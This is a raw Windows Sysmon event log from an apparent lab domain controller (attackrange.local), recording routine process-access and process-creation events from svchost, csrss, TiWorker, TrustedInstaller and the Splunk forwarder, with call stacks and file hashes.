08:41:26.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002092Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.339{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002091Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.339{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16B6-5F84-5C00-000000007F01}3676C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002090Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.339{5D479F2C-16B1-5F84-3000-000000007F01}26163792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B6-5F84-5C00-000000007F01}3676C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002089Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.348{5D479F2C-16B6-5F84-5C00-000000007F01}3676C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002088Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B6-5F84-5B00-000000007F01}3616C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002087Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002086Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002085Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002084Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002083Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002082Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002081Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002080Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002079Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002078Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.293{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16B6-5F84-5B00-000000007F01}3616C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002077Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.277{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B6-5F84-5B00-000000007F01}3616C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002076Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.288{5D479F2C-16B6-5F84-5B00-000000007F01}3616C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe10.0.14393.3926 (rs1_release.200817-1737)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=A8CBBA3111CF28435F7E8C8B94EC6FBD,SHA256=D4DDF9F7CB94FE55C7EA1CA90AB9638A883B84308C858EF466554E32FB17EFC3,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{5D479F2C-16A1-5F84-0C00-000000007F01}612C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002075Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.261{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B6-5F84-5A00-000000007F01}3764C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002074Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.246{5D479F2C-169F-5F84-0A00-000000007F01}856948C:\Windows\system32\services.exe{5D479F2C-16B6-5F84-5A00-000000007F01}3764C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002073Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002072Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002071Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002070Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002069Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.246{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002068Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 